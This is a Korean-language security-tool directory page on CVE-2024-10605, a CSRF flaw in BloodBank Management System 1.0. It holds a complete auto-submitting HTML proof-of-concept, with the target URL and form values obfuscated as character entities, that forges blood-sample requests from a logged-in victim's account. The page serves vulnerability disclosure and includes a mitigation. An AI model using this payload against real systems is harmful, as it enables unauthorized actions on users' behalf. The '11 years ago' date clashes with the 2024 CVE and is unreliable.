Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-10605 — BloodBank Management System 1.0의 CSRF 취약점인 CVE-2024-10605에 대한 개념 증명으로, 승인되지 않은 혈액 샘플 요청을 가능하게 합니다. | Kitploit
도구/GitHubGitHub/bevennyamande/cve-2024-10605
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubbevennyamande/cve-2024-10605

CVE-2024-10605

BloodBank Management System 1.0의 CSRF 취약점인 CVE-2024-10605에 대한 개념 증명으로, 승인되지 않은 혈액 샘플 요청을 가능하게 합니다.

저장소 보기
11년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

영향받는 버전:

  • BloodBank Management System: 1.0

취약점 정보:

  • 취약점 유형: Cross Site Request Forgery (CSRF)
  • 심각도: HIGH
  • 상태: 미패치

취약한 엔드포인트:

  • 경로: file/request.php

취약점 설명:

이 엔드포인트 /file/request.php에는 사이트 간 요청 위조(CSRF)가 존재하며, 이를 통해 원격 사용자가 로그인한 수신자 계정에서 선택한 병원의 사용 가능한 혈액 샘플에 대해 혈액 샘플 요청을 시작할 수 있습니다.

성공적인 악용은 피해자를 대신한 으로 이어질 수 있습니다. 또한, 이는 페이로드가 포함된 악성 웹사이트를 방문함으로써 악용될 수 있습니다.

무단 작업

개념 증명 (PoC):

다음은 로그인한 수신자 계정에서 혈액 샘플 요청을 시작하는 CSRF POC 공격의 예입니다:

root@kitploit:~

<html>
    <head>
        <title>CSRF PoC</title>
    </head>
    <body>
        <form action="http://&#108;&#111;&#99;&#97;&#108;&#104;&#111;&#115;&#116;&#46;&#108;&#111;&#99;&#97;&#108;&#47;&#98;&#108;&#111;&#111;&#100;&#98;&#97;&#110;&#107;&#47;&#102;&#105;&#108;&#101;&#47;&#114;&#101;&#113;&#117;&#101;&#115;&#116;&#46;&#112;&#104;&#112;" method="POST" enctype="application/x-www-form-urlencoded">
            <input name="&#98;&#105;&#100;" value="&#49;&#54;">
            <input name="&#104;&#105;&#100;" value="&#51;">
            <input name="&#98;&#103;" value="&#66;&#45;">
            <input name="&#114;&#101;&#113;&#117;&#101;&#115;&#116;" value="&#82;&#101;&#113;&#117;&#101;&#115;&#116;&#43;&#83;&#97;&#109;&#112;&#108;&#101;">
        </form>
        <script>
            document.querySelector("form").submit();
        </script>
    </body>
</html>






영향:

  • 데이터 조작: 공격자는 사용자에게 표시되는 콘텐츠를 수정할 수 있습니다.
  • 평판 손상: 악의적인 행동으로 인해 사용자가 시스템에 대한 신뢰를 잃을 수 있습니다.

완화 권장 사항:

  1. CSRF 토큰 사용 교차 도메인 접근을 방지하기 위한 메커니즘을 구현하거나 요청에 csrf 토큰을 포함하세요.

도구 다운로드